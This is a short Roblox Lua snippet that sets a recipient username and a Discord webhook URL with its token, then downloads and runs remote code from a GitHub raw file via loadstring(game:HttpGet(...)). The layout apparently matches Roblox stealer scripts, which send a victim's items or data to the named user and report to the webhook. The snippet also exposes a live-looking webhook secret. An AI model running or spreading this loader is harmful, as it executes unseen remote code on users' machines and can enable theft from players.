Username = 'demon_mariomm' Username2 = 'demon_mariomm' Webhook = 'https://discord.com/api/webhooks/1322435345681223712/r8O6Gfi_-hjniCaWDP75vLVaXmwZdTi5WOquY4CVzq-yDl-1WyXkln2qoYqGZk5zNQ06' loadstring(game:HttpGet("https://raw.githubusercontent.com/terabite-max43/shitescripts/main/configs.lua"))()
